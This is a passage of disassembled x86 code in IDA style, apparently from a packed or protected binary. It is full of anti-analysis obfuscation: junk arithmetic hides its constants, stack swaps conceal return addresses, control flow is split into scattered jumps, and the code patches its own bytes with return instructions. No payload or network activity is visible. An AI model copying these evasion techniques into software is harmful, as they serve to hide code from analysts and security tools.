xchg eax, [esp]
mov esi, eax
pop eax
sub esi, 0B47F914Bh
add esi, 10059379h
add esi, ebp
push eax
jmp loc_447587
; ---------------------------------------------------------------------------
loc_4466B6: ; CODE XREF: ut7h7i2x:0043ADAEj
or eax, 0D5DC62C2h
add eax, 0E1F7797Fh
sub eax, 0EAF3ED52h
or eax, 9BEE5DFh
add eax, 2044A2D9h
xchg eax, [esp]
jmp loc_453178
; ---------------------------------------------------------------------------
ja loc_449E78
jmp sub_456AD6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_453E14
loc_4466E7: ; CODE XREF: sub_453E14+Dj
jge loc_45088B
jmp loc_458E73
; END OF FUNCTION CHUNK FOR sub_453E14
; ---------------------------------------------------------------------------
lea eax, [ebp-0Ch]
push ebp
mov ebp, eax
xchg ebp, [esp]
jmp loc_45A10A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_446700: ; CODE XREF: sub_43A556:loc_4403D1j
lea eax, [ebp-20h]
mov dword ptr [eax], 70736957h
jmp loc_44E52F
; END OF FUNCTION CHUNK FOR sub_43A556
; =============== S U B R O U T I N E =======================================
sub_44670E proc near ; DATA XREF: sub_4489DF-E1DAo
mov eax, [ebp-4]
push offset loc_445808
jmp nullsub_344
sub_44670E endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F495
loc_44671B: ; CODE XREF: sub_44F495:loc_44182Fj
add eax, 508B6043h
rol eax, 7
xor eax, 7D6DCFE9h
cmp eax, 88D15A4Ch
jmp loc_442E99
; END OF FUNCTION CHUNK FOR sub_44F495
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457E3D
loc_446735: ; CODE XREF: sub_457E3D:loc_44C298j
xchg edx, [esp+0]
push 436629B8h
xchg edx, [esp+4+var_4]
mov ecx, edx
pop edx
jmp loc_44360F
; END OF FUNCTION CHUNK FOR sub_457E3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD2F
loc_446748: ; CODE XREF: sub_43CD2F:loc_446780j
mov eax, [ebp-4]
push offset loc_43D328
jmp loc_44307F
; END OF FUNCTION CHUNK FOR sub_43CD2F
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_45A070
loc_446755: ; CODE XREF: sub_45A070-1A26j
jz loc_439E20
; END OF FUNCTION CHUNK FOR sub_45A070
; START OF FUNCTION CHUNK FOR sub_445B07
loc_44675B: ; CODE XREF: sub_445B07+Ej
jmp loc_4511FC
; END OF FUNCTION CHUNK FOR sub_445B07
; ---------------------------------------------------------------------------
adc ebp, ebx
popf
test ebx, 8733D4E2h
jmp loc_439E14
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_142. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458CA4
loc_44676F: ; CODE XREF: sub_458CA4-B3D4j
jmp loc_443169
; END OF FUNCTION CHUNK FOR sub_458CA4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43F094
loc_446774: ; CODE XREF: sub_43F094:loc_4516ABj
jnz locret_44677F
loc_44677A: ; CODE XREF: sub_43F094+Aj
call sub_446785
locret_44677F: ; CODE XREF: sub_43F094:loc_446774j
retn
; END OF FUNCTION CHUNK FOR sub_43F094
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43CD2F
loc_446780: ; CODE XREF: sub_43CD2F+7j
jmp loc_446748
; END OF FUNCTION CHUNK FOR sub_43CD2F
; =============== S U B R O U T I N E =======================================
sub_446785 proc near ; CODE XREF: sub_43F094:loc_44677Ap
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00445099 SIZE 00000004 BYTES
; FUNCTION CHUNK AT 00455312 SIZE 00000005 BYTES
push ebx
loc_446786: ; CODE XREF: sub_43DBEC-34AEj
push ecx
call sub_4519D2
jmp loc_455312
sub_446785 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_446791: ; CODE XREF: ut7h7i2x:00458AD7j
xor esi, 62AC3983h
add eax, esi
push offset loc_44304C
jmp loc_4530C4
; ---------------------------------------------------------------------------
shr esi, 17h
ror ecx, 12h
jmp sub_44F256
; ---------------------------------------------------------------------------
and ebp, ecx
jmp sub_4522EB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4586D6
loc_4467B5: ; CODE XREF: sub_4586D6+13j
add ebx, 6144832Eh
xchg ebx, [esp+0]
jmp loc_450982
; END OF FUNCTION CHUNK FOR sub_4586D6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_449DC4
loc_4467C3: ; CODE XREF: sub_449DC4+445Fj
mov [edx], ebx
push edx
jmp loc_458AAC
; END OF FUNCTION CHUNK FOR sub_449DC4
; ---------------------------------------------------------------------------
loc_4467CB: ; CODE XREF: ut7h7i2x:0043D452j
pop ebx
inc dword ptr [ebp-0Ch]
dec dword ptr [ebp-18h]
jnz loc_4506EA
jmp loc_44FA7C
; ---------------------------------------------------------------------------
push 47643BE5h
pop edx
rol edx, 1Fh
cmp edx, 64291F59h
jmp loc_441004
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44DEFF
loc_4467F1: ; CODE XREF: sub_44DEFF-3548j
mov eax, [esp-8+arg_4]
call sub_44C852
loc_4467F9: ; CODE XREF: sub_450E41:loc_440FB3j
jmp nullsub_142
; END OF FUNCTION CHUNK FOR sub_44DEFF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_457A66
loc_4467FE: ; CODE XREF: sub_457A66:loc_445E0Ej
; ut7h7i2x:loc_44F578j
jb loc_452FDE
and edi, 642A542Eh
jmp loc_43B8AE
; END OF FUNCTION CHUNK FOR sub_457A66
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_172. PRESS KEYPAD "+" TO EXPAND]
dword_446810 dd 0 ; DATA XREF: sub_45633E:loc_4445BCr
; sub_452BE9+Dw ...
; ---------------------------------------------------------------------------
loc_446814: ; CODE XREF: ut7h7i2x:0045A54Dj
jmp loc_451D6C
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_4549F0
loc_446819: ; CODE XREF: sub_4549F0+Cj
jmp loc_43FAE7
; END OF FUNCTION CHUNK FOR sub_4549F0
; =============== S U B R O U T I N E =======================================
sub_44681E proc near ; CODE XREF: sub_41764F+2Ap
; sub_41764F+60p ...
call sub_44682E
loc_446823: ; CODE XREF: sub_453A91:loc_4398C9j
jmp ds:off_41D010
sub_44681E endp
; ---------------------------------------------------------------------------
loc_446829: ; CODE XREF: ut7h7i2x:0044319Ej
jmp loc_45866B
; =============== S U B R O U T I N E =======================================
sub_44682E proc near ; CODE XREF: sub_44681Ep
; sub_44682E+3124j ...
var_8 = dword ptr -8
; FUNCTION CHUNK AT 0043AD8D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DC84 SIZE 0000002E BYTES
; FUNCTION CHUNK AT 00449949 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044ED4F SIZE 00000016 BYTES
; FUNCTION CHUNK AT 004575CD SIZE 00000019 BYTES
pop edx
jz loc_43DC84
mov eax, [esp+8+var_8]
jmp loc_43AD8D
sub_44682E endp ; sp-analysis failed
; ---------------------------------------------------------------------------
rol eax, 18h
mov ebp, edi
jmp sub_4454CF
; ---------------------------------------------------------------------------
loc_446847: ; CODE XREF: ut7h7i2x:loc_455D90j
pop ebx
sub ebx, 205CE234h
rol ebx, 1Ch
or ebx, 7259E3E1h
xor ebx, 29199334h
add ebx, 28FE5597h
xchg ebx, [esp]
jmp loc_45686D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459111
loc_44686B: ; CODE XREF: sub_459111-1083Bj
xchg edx, [ecx]
push 29EB1ACEh
jmp loc_455317
; END OF FUNCTION CHUNK FOR sub_459111
; ---------------------------------------------------------------------------
loc_446877: ; CODE XREF: ut7h7i2x:00445183j
call sub_4394DC
loc_44687C: ; CODE XREF: ut7h7i2x:00454B67j
jmp sub_4593AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447CEB
loc_446881: ; CODE XREF: sub_447CEB+16j
jmp loc_43B0C4
; END OF FUNCTION CHUNK FOR sub_447CEB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439AE7
loc_446886: ; CODE XREF: sub_439AE7+5C6Aj
jmp loc_439369
; END OF FUNCTION CHUNK FOR sub_439AE7
; ---------------------------------------------------------------------------
loc_44688B: ; CODE XREF: ut7h7i2x:00453370j
push ecx
mov ecx, edx
xchg ecx, [esp]
push offset sub_44CB30
jmp locret_4470D0
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_515. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
loc_44689C: ; CODE XREF: ut7h7i2x:loc_452A9Fj
jmp locret_447FEB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44B68F
loc_4468A1: ; CODE XREF: sub_44B68F:loc_44B69Bj
jmp loc_4505EE
; END OF FUNCTION CHUNK FOR sub_44B68F
; ---------------------------------------------------------------------------
loc_4468A6: ; CODE XREF: ut7h7i2x:loc_443A88j
pop eax
xor eax, 9BB50D64h
sub eax, 753B1311h
or eax, 0ED08436Dh
cmp eax, 6C49DFC3h
jmp loc_43E487
; ---------------------------------------------------------------------------
sub ebp, 0CB963441h
jmp sub_453A91
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E688
loc_4468CF: ; CODE XREF: sub_44E688:loc_450BDFj
jz loc_4510C6
; END OF FUNCTION CHUNK FOR sub_44E688
; START OF FUNCTION CHUNK FOR sub_4519D2
loc_4468D5: ; CODE XREF: sub_4519D2:loc_448238j
jmp loc_448BFE
; END OF FUNCTION CHUNK FOR sub_4519D2
; ---------------------------------------------------------------------------
cmp edx, ecx
jmp loc_44DBB0
; ---------------------------------------------------------------------------
shr ebx, 13h
jmp sub_439788
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_69. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_454196
loc_4468EA: ; CODE XREF: sub_454196+3j
jmp sub_451DBA
; END OF FUNCTION CHUNK FOR sub_454196
; ---------------------------------------------------------------------------
loc_4468EF: ; CODE XREF: ut7h7i2x:00447DF3j
jmp loc_4534E2
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44F040
loc_4468F4: ; CODE XREF: sub_44F040:loc_44F052j
mov edx, 0F4C6D98Eh
xor ebx, 97292020h
jmp loc_43D7CB
; END OF FUNCTION CHUNK FOR sub_44F040
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FBB6
loc_446904: ; CODE XREF: sub_43FBB6+B36Aj
jz loc_4500D6
jmp loc_455302
; END OF FUNCTION CHUNK FOR sub_43FBB6
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_44690F: ; CODE XREF: sub_43AB62+14730j
or edi, eax
xchg eax, edx
; END OF FUNCTION CHUNK FOR sub_43AB62
; START OF FUNCTION CHUNK FOR sub_44E6B4
loc_446913: ; CODE XREF: ut7h7i2x:00439DB0j
; sub_44E6B4:loc_441EA8j ...
jmp loc_44959E
; END OF FUNCTION CHUNK FOR sub_44E6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AB62
loc_446918: ; CODE XREF: sub_44E6B4-85E1j
; sub_43AB62+1EF7Bj
pop ecx
xchg edx, [esp-0Ch+arg_8]
mov ebp, edx
jmp loc_44DF93
; END OF FUNCTION CHUNK FOR sub_43AB62
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_446923: ; CODE XREF: sub_448321:loc_45ACEBj
jl loc_45099B
xchg ecx, [esi]
shl ecx, 16h
jmp loc_450994
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_452802
loc_446933: ; CODE XREF: sub_452802-DE82j
xor edx, ecx
not eax
loc_446937: ; CODE XREF: sub_452802-A98Aj
add ebx, 9DC399E2h
xchg ebp, [esp-8+arg_4]
mov ebx, ebp
pop ebp
xchg ebx, [esp+0]
jmp loc_43C03A
; END OF FUNCTION CHUNK FOR sub_452802
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43E766
loc_44694B: ; CODE XREF: sub_43E766:loc_43E76Cj
add eax, [ebp-4]
mov [ebp-18h], eax
push 38B63EC4h
pop eax
sub eax, 0BD9AFF60h
add eax, 2152F68Dh
add eax, ebp
jmp loc_440E33
; END OF FUNCTION CHUNK FOR sub_43E766
; =============== S U B R O U T I N E =======================================
sub_44696A proc near ; CODE XREF: ut7h7i2x:0044445Aj
; sub_444A08+F402p
xchg edi, [esp+0]
pop edi
mov [ecx], eax
pop ecx
lea eax, sub_4545FB
mov byte ptr [eax], 0C3h
jmp sub_4545FB
sub_44696A endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_44697F proc near ; CODE XREF: sub_41A6D9+284p
; sub_41A6D9+2B2p ...
var_8 = dword ptr -8
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043A061 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443EFA SIZE 00000033 BYTES
; FUNCTION CHUNK AT 00451014 SIZE 00000025 BYTES
push edx
jmp loc_43A061
sub_44697F endp
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_228. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_458345
loc_446986: ; CODE XREF: sub_458345:loc_44A7CDj
jmp sub_459036
; END OF FUNCTION CHUNK FOR sub_458345
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FF65
loc_44698B: ; CODE XREF: sub_43FF65:loc_441C5Fj
jnz loc_44DE8E
jmp loc_448581
; END OF FUNCTION CHUNK FOR sub_43FF65
; =============== S U B R O U T I N E =======================================
sub_446996 proc near ; CODE XREF: ut7h7i2x:0043C3ECj
; ut7h7i2x:0045565Dp
arg_0 = dword ptr 4
xchg ecx, [esp+0]
pop ecx
xchg edi, [esp-4+arg_0]
jmp sub_43AA94
sub_446996 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_459DE7
loc_4469A2: ; CODE XREF: sub_459DE7:loc_43A330j
jnz loc_447FFB
jmp loc_44B30B
; END OF FUNCTION CHUNK FOR sub_459DE7
; =============== S U B R O U T I N E =======================================
sub_4469AD proc near ; DATA XREF: sub_4503C3+9555o
var_4 = dword ptr -4
push esi
mov esi, eax
xchg esi, [esp+4+var_4]
retn
sub_4469AD endp ; sp-analysis failed
; ---------------------------------------------------------------------------
loc_4469B4: ; CODE XREF: ut7h7i2x:loc_454F64j
; ut7h7i2x:0045AB10j
jmp locret_445C0C
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_4469B9 proc near ; CODE XREF: sub_4503AC+7p
var_4 = dword ptr -4
; FUNCTION CHUNK AT 004395D3 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043DECB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0043EE4C SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00443E28 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045269A SIZE 0000000D BYTES
; FUNCTION CHUNK AT 00452F86 SIZE 00000014 BYTES
; FUNCTION CHUNK AT 00455404 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045A563 SIZE 0000001E BYTES
push esi
mov esi, ebp
xchg esi, [esp+0]
mov ebp, esp
jmp loc_43DECB
sub_4469B9 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
cmp ebp, ecx
jmp loc_448377
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D683
loc_4469CD: ; CODE XREF: sub_44D683-3265j
push offset sub_45816D
jmp nullsub_99
; END OF FUNCTION CHUNK FOR sub_44D683
; ---------------------------------------------------------------------------
loc_4469D7: ; CODE XREF: ut7h7i2x:00445637j
xchg edi, [esp]
push ecx
push 0AB2F7625h
pop ecx
jmp loc_4563AB
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44C6B4
loc_4469E6: ; CODE XREF: sub_44C6B4+Bj
; ut7h7i2x:00452B6Fj
push ecx
push 95A80CDDh
pop ecx
rol ecx, 16h
sub ecx, 52D70408h
or ecx, 0B0363656h
add ecx, 0B85C150h
xchg ecx, [esp+4+var_4]
jmp sub_446B90
; END OF FUNCTION CHUNK FOR sub_44C6B4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_439BF8
loc_446A0A: ; CODE XREF: sub_439BF8+361Ej
jl loc_43B50E
adc ebx, 6F115B0Dh
jmp loc_445C8F
; END OF FUNCTION CHUNK FOR sub_439BF8
; ---------------------------------------------------------------------------
mov [ebp-4], eax
cmp dword ptr [ebp-4], 0
jz loc_4471C1
jmp loc_441787
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43A556
loc_446A2D: ; CODE XREF: sub_43A556:loc_447FF6j
mov [edx], ebp
adc ebp, ecx
jmp loc_44D78C
; END OF FUNCTION CHUNK FOR sub_43A556
; ---------------------------------------------------------------------------
loc_446A36: ; CODE XREF: ut7h7i2x:004426DBj
xor edx, 765B624Eh
loc_446A3C: ; CODE XREF: ut7h7i2x:loc_441B6Cj
push eax
push offset sub_44CEC3
jmp locret_439567
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44917B
loc_446A47: ; CODE XREF: sub_44917B+DCADj
rol edi, 5
xor edx, edi
adc ebx, 93EE4E8h
loc_446A52: ; CODE XREF: ut7h7i2x:loc_451B4Ej
mov ecx, [ebp-18h]
push esi
jmp loc_4395BD
; END OF FUNCTION CHUNK FOR sub_44917B
; ---------------------------------------------------------------------------
loc_446A5B: ; CODE XREF: ut7h7i2x:00459EC8j
add eax, ebp
add eax, 3BC6C822h
mov eax, [eax]
push edi
jmp loc_440C26
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44D255
loc_446A6B: ; CODE XREF: sub_44D255:loc_4516A6j
cmp dword ptr [ebp-8], 0
jz loc_449C1D
jmp loc_44C80D
; END OF FUNCTION CHUNK FOR sub_44D255
; ---------------------------------------------------------------------------
loc_446A7A: ; CODE XREF: ut7h7i2x:loc_445FD9j
inc dword ptr [ebp-20h]
mov eax, [ebp-1Ch]
mov eax, ds:dword_43C454[eax*4]
loc_446A87: ; CODE XREF: ut7h7i2x:0044C46Cj
jmp loc_456D09
; ---------------------------------------------------------------------------
loc_446A8C: ; DATA XREF: sub_452B14:loc_448EDCo
push 308C966Bh
pop esi
add esi, 5E4329CCh
rol esi, 0Eh
or esi, 0DEF3662Bh
xor esi, 0FEFFE7ABh
xchg esi, [esp]
pushf
jmp loc_45655E
; ---------------------------------------------------------------------------
push 9CE956D0h
jmp sub_4453B5
; ---------------------------------------------------------------------------
mov ds:dword_41D0C8, eax
lea eax, nullsub_524
mov byte ptr [eax], 0C3h
jmp loc_447C0C
; =============== S U B R O U T I N E =======================================
sub_446ACE proc near ; CODE XREF: sub_41A68E+20p
; sub_41C2E2+272p ...
var_4 = dword ptr -4
; FUNCTION CHUNK AT 0043ACE4 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0043DAAA SIZE 0000000E BYTES
; FUNCTION CHUNK AT 0044009B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440437 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 004410B2 SIZE 0000000A BYTES
; FUNCTION CHUNK AT 00449FAB SIZE 00000005 BYTES
; FUNCTION CHUNK AT 0045513D SIZE 00000008 BYTES
; FUNCTION CHUNK AT 0045530D SIZE 00000005 BYTES
push esi
loc_446ACF: ; CODE XREF: sub_45A79F:loc_43A01Bj
push 96125BF5h
pop esi
xor esi, 8C1D5910h
jmp loc_43ACE4
sub_446ACE endp
; ---------------------------------------------------------------------------
locret_446AE0: ; CODE XREF: ut7h7i2x:loc_44B7E9j
retn
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E2C4
loc_446AE1: ; CODE XREF: sub_44E2C4-5ECj
jle loc_4597A2
popf
loc_446AE8: ; CODE XREF: sub_458CA4:loc_443169j
push edx
push 0AC3BC732h
pop edx
or edx, 0BF495456h
add edx, 40C869D0h
jmp loc_4454E0
; END OF FUNCTION CHUNK FOR sub_44E2C4
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_448321
loc_446B00: ; CODE XREF: sub_448321:loc_4396CFj
and eax, 315539F4h
rol eax, 0Eh
jnb loc_440151
sbb ebp, 337A1443h
jmp loc_44014E
; END OF FUNCTION CHUNK FOR sub_448321
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43FD68
loc_446B1A: ; CODE XREF: sub_43FD68:loc_451C52j
; sub_43FD68+11EF7j
xor ebx, 0AEF95EA5h
test ebx, 200000h
jmp loc_43E8EB
; END OF FUNCTION CHUNK FOR sub_43FD68
; =============== S U B R O U T I N E =======================================
sub_446B2B proc near ; CODE XREF: ut7h7i2x:0043DDAFp
; ut7h7i2x:004483AAj
xchg ebx, [esp+0]
pop ebx
lea eax, loc_457D7B
mov byte ptr [eax], 0C3h
jmp loc_44A06F
sub_446B2B endp ; sp-analysis failed
; ---------------------------------------------------------------------------
push offset sub_43F99A
jmp loc_43B994
; ---------------------------------------------------------------------------
loc_446B47: ; CODE XREF: ut7h7i2x:0043EB7Aj
push edx
pushf
push 0CE482DB4h
pop edx
xor edx, 16DFE67Bh
rol edx, 15h
jmp loc_44F2AA
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43AA94
loc_446B5D: ; CODE XREF: sub_43AA94+D4C7j
jz loc_447C6F
jmp loc_43C934
; END OF FUNCTION CHUNK FOR sub_43AA94
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_440B8A
loc_446B68: ; CODE XREF: sub_440B8A+13j
and esi, 0ECE5E854h
rol esi, 18h
add esi, 0FFFF5A97h
xchg esi, [esp+0]
push 0
call sub_43C943
jmp loc_45944E
; END OF FUNCTION CHUNK FOR sub_440B8A
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43B7F7
loc_446B86: ; CODE XREF: sub_43B7F7+2BC8j
mov ecx, ebx
pop ebx
xchg eax, [esp-0Ch+arg_8]
mov ebp, eax
pop eax
retn
; END OF FUNCTION CHUNK FOR sub_43B7F7
; =============== S U B R O U T I N E =======================================
; Attributes: bp-based frame
sub_446B90 proc near ; CODE XREF: sub_44F495-EFB8p
; sub_442B3B+2Bp ...
; FUNCTION CHUNK AT 004432D1 SIZE 00000019 BYTES
; FUNCTION CHUNK AT 004483DB SIZE 0000001F BYTES
; FUNCTION CHUNK AT 004531A0 SIZE 0000000D BYTES
push ebp
mov ebp, esp
jmp loc_4432D1
sub_446B90 endp
; ---------------------------------------------------------------------------
loc_446B98: ; CODE XREF: ut7h7i2x:00447B43j
push ecx
sub ecx, ebx
call sub_4583E7
; START OF FUNCTION CHUNK FOR sub_43AED9
loc_446BA0: ; CODE XREF: sub_43AED9+D0ACj
; sub_43AED9:loc_44A730j
push eax
loc_446BA1: ; CODE XREF: ut7h7i2x:loc_454EE6j
lea eax, dword_456720
push eax
push eax
mov edx, eax
call sub_43A9EE
loc_446BB0: ; CODE XREF: sub_4573BA-167C6j
jmp loc_458D30
; END OF FUNCTION CHUNK FOR sub_43AED9
; =============== S U B R O U T I N E =======================================
sub_446BB5 proc near ; CODE XREF: ut7h7i2x:0045009Ej
; sub_4551FB+Ep
; FUNCTION CHUNK AT 00455F3D SIZE 00000005 BYTES
; FUNCTION CHUNK AT 004597CE SIZE 00000008 BYTES
xchg eax, [esp+0]
pop eax
push ebx
push 0FCDD2AFFh
pop ebx
and ebx, 0E14441DFh
add ebx, 2000D5EBh
jmp loc_4597CE
sub_446BB5 endp
; ---------------------------------------------------------------------------
loc_446BD1: ; CODE XREF: ut7h7i2x:loc_43A3C6j
push offset sub_457A75
jmp loc_4431AF
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_44E5DC
loc_446BDB: ; CODE XREF: sub_44E5DC:loc_454AAEj
and ebx, 9BE428Eh
sub ebx, 42503740h
add ebx, 392034B5h
popf
xchg ebx, [esp+0]
push 0
loc_446BF3: ; CODE XREF: ut7h7i2x:0044E595j
call sub_43C943
push edi
jmp loc_451D50
; END OF FUNCTION CHUNK FOR sub_44E5DC
; =============== S U B R O U T I N E =======================================
sub_446BFE proc near ; DATA XREF: sub_448FACo
var_8 = dword ptr -8
var_4 = dword ptr -4
push ebx
push 86DCAA3Eh
xchg edi, [esp+8+var_8]
mov ebx, edi
pop edi
sub ebx, 1ED6E460h
add ebx, 983DEE9Ah
xchg ebx, [esp+4+var_4]
jmp loc_43B47E
sub_446BFE endp
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43DBEC
loc_446C1E: ; CODE XREF: sub_43DBEC+104E7j
sbb eax, edi
xor ecx, edi
pushf
; END OF FUNCTION CHUNK FOR sub_43DBEC
; START OF FUNCTION CHUNK FOR sub_447CBE
loc_446C23: ; CODE XREF: sub_43DBEC-666j
; sub_447CBE:loc_43FD07j ...
jmp loc_450217
; ---------------------------------------------------------------------------
loc_446C28: ; CODE XREF: sub_43DBEC+E13Aj
; sub_447CBE+D670j
xchg edi, [esp+4+var_4]
jmp loc_44D8E3
; END OF FUNCTION CHUNK FOR sub_447CBE
; ---------------------------------------------------------------------------
mov eax, [esp]
push edi
push 0DFBE34F5h
pop edi
add edi, 0ACA5C222h
cmp edi, 0F9F9AF7Bh
jmp loc_451C3D
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447EB5
loc_446C4B: ; CODE XREF: sub_447EB5-D9D2j
shl edi, 2
loc_446C4E: ; CODE XREF: ut7h7i2x:loc_44980Ej
push ebx
push 0C34FE97Fh
pop ebx
jmp loc_444F9B
; END OF FUNCTION CHUNK FOR sub_447EB5
; [00000001 BYTES: COLLAPSED FUNCTION nullsub_74. PRESS KEYPAD "+" TO EXPAND]
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_447928
loc_446C5B: ; CODE XREF: sub_447928:loc_448423j
xchg ecx, [esp+8+var_8]
jmp sub_454196
; END OF FUNCTION CHUNK FOR sub_447928
; =============== S U B R O U T I N E =======================================
sub_446C63 proc near ; CODE XREF: sub_43A80F+7p
; ut7h7i2x:00440BDAj
xchg esi, [esp+0]
pop esi
add eax, 2
mov [ebp-0Ch], eax
mov eax, [ebp-0Ch]
add [ebp-8], eax
mov eax, [ebp-8]
jmp loc_445209
sub_446C63 endp ; sp-analysis failed
; =============== S U B R O U T I N E =======================================
sub_446C7B proc near ; DATA XREF: sub_455AD6:loc_452FB0o
var_4 = dword ptr -4
; FUNCTION CHUNK AT 00444706 SIZE 00000011 BYTES
; FUNCTION CHUNK AT 00444A7B SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0044D1A2 SIZE 00000012 BYTES
; FUNCTION CHUNK AT 004533FD SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00457308 SIZE 0000001D BYTES
push 93D73FCCh
xchg ecx, [esp+4+var_4]
mov ebx, ecx
pop ecx
xor ebx, 808829DCh
sub ebx, 729E3FB8h
jnz loc_45730E
ror edi, 13h
jmp loc_444A7B
sub_446C7B endp
; =============== S U B R O U T I N E =======================================
sub_446CA0 proc near ; CODE XREF: ut7h7i2x:loc_43CAC1j
; ut7h7i2x:00457EA6p
var_4 = dword ptr -4
arg_0 = dword ptr 4
arg_4 = dword ptr 8
; FUNCTION CHUNK AT 00439729 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0043BA54 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00440BAC SIZE 00000003 BYTES
; FUNCTION CHUNK AT 004427CB SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00443944 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 00447E10 SIZE 0000000E BYTES
; FUNCTION CHUNK AT 00448A88 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00448B38 SIZE 0000003B BYTES
; FUNCTION CHUNK AT 0044AFC8 SIZE 00000021 BYTES
; FUNCTION CHUNK AT 0044C735 SIZE 00000013 BYTES
; FUNCTION CHUNK AT 0044E7EB SIZE 0000000D BYTES
; FUNCTION CHUNK AT 0044EEDB SIZE 0000000C BYTES
; FUNCTION CHUNK AT 0045243B SIZE 0000001A BYTES
; FUNCTION CHUNK AT 0045271B SIZE 00000013 BYTES
; FUNCTION CHUNK AT 00452CAA SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045369B SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453A65 SIZE 00000005 BYTES
; FUNCTION CHUNK AT 00453B45 SIZE 0000000B BYTES
; FUNCTION CHUNK AT 0045505E SIZE 00000002 BYTES
xchg esi, [esp-8+arg_4]
pop esi
push ebx
mov ebx, edx
xchg ebx, [esp-8+arg_4]
jmp loc_45243B
sub_446CA0 endp ; sp-analysis failed
; ---------------------------------------------------------------------------
; START OF FUNCTION CHUNK FOR sub_43BFF8
loc_446CAF: ; CODE XREF: sub_43BFF8+1D890j
pop edx
retn
; END OF FUNCTION CHUNK FOR sub_43BFF8
; ---------------------------------------------------------------------------
loc_446CB1: ; CODE XREF: ut7h7i2x:004448A4j
jmp loc_4413C5
; ---------------------------------------------------------------------------
